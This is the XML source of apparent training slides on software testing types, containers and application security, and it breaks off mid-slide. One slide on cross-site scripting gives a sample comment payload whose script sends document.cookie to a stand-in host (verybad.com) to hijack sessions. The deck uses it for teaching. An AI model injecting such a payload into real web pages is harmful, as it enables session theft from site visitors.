          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="437766" y="1655763"/>
            <a:ext cx="3808797" cy="1824038"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Software </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Testing </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Types</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B81E928D-C72D-C740-B29B-91A6280FACA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4724401" y="595312"/>
            <a:ext cx="4419599" cy="3657600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1352464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9C0C7-C511-BD4F-9215-AE9F9192F01D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="437766" y="341313"/>
            <a:ext cx="8345488" cy="4440237"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Unit Testing</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>Test the smallest units of software. The unit can be a module, function, class, procedure, and so on.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>Good unit tests should have the following characteristics</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>- Reliable</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>- Isolated</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>- Fast</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>- Readable</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-IN" dirty="0"/>
            </a:b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endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B75C9DF1-21FC-1F41-BC54-5AFACD5D5054}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="322357" y="2724150"/>
            <a:ext cx="8784772" cy="1763485"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="727827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CF998-B694-BD40-9B7E-86D9A7794288}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="437766" y="260010"/>
            <a:ext cx="8345488" cy="1778340"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:br>
              <a:rPr lang="en-IN" b="1" dirty="0">
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0">
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Integration Testing</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" b="1" dirty="0">
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>est how software components work together.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" b="1" dirty="0">
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-IN" b="1" dirty="0">
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Two Approach:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1) Big Bang Approach</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2) Incremental Approach – Top-down, Bottom-up, Sandwich</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30504D38-61FA-6B4B-861A-575A8C3302F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="437766" y="2038349"/>
            <a:ext cx="2838834" cy="2681061"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37A9F016-13D9-F14A-BFE9-56F999B52F9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4953000" y="2022929"/>
            <a:ext cx="3060700" cy="2681062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3996957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EF665-0935-42E1-9339-85CB3664B3C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="416425" y="1071562"/>
            <a:ext cx="7598042" cy="2188214"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" dirty="0"/>
              <a:t>Containers:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="3600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" dirty="0"/>
              <a:t> How did we get here?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="3600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" dirty="0"/>
              <a:t>What are we solving?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="173862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A0749-2ED6-A84B-A8EB-1118C8C8C08D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="437766" y="341313"/>
            <a:ext cx="8345488" cy="1011237"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:br>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>System Testing</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>Test the functionality of the entire system.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8099DA63-22C1-B841-9737-7C179C212660}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905000" y="1352550"/>
            <a:ext cx="5181600" cy="3206750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="363104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E6702-3EDC-7A49-9CB3-D1DD79DD1B05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Acceptance Testing</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>Test if the system is ready for delivery</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4F8986C-EB22-524B-BE87-47006720F640}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2635250" y="1352550"/>
            <a:ext cx="3873500" cy="2882900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="621356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EF665-0935-42E1-9339-85CB3664B3C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="239409"/>
            <a:ext cx="7598042" cy="732924"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>Application Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6107D26-D4A2-490F-BDE9-401E7F1EF2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294" y="213670"/>
            <a:ext cx="941388" cy="585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0A95B869-A19A-499A-84CC-05CD9768F679}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="511442" y="1352550"/>
            <a:ext cx="7696200" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Network Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Firewalls, SSL, Intrusion Detection Systems, Operating System</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Hardening, Database Hardening</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Application Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Securing the code that drives a web application </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Securing libraries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Securing backend systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Securing web and application servers </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2177595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62301" y="951481"/>
            <a:ext cx="8277344" cy="3389312"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>XSS flaws occur whenever an application takes user supplied data and sends it to a web browser without first validating or encoding that content. XSS allows attackers to execute script in the victim's browser which can hijack user sessions, deface web sites, possibly introduce worms, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Example Comment embedded with JavaScript </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>comment=“Something Good! &lt;script&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>window.open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>( http://verybad.com/hijack.php?document.cookie&lt;/script&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="344685" indent="-342900"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="344685" indent="-342900"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Cross-Site Scripting (XSS)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="462301" y="2646137"/>
            <a:ext cx="8513064" cy="1297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7523" indent="-185738" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="386656" indent="-193775" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="546497"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3pPr>
            <a:lvl4pPr marL="706339" indent="-159842" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="773311" indent="-66973" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">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785" marR="0" lvl="0" indent="0" algn="l" defTabSz="914378" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="900"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="100000"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="282828"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
              <a:sym typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="209261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5443" y="171449"/>
            <a:ext cx="8434845" cy="3064443"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Stored</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t> - the injected code is permanently stored (in a database, message forum, visitor log, etc.) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
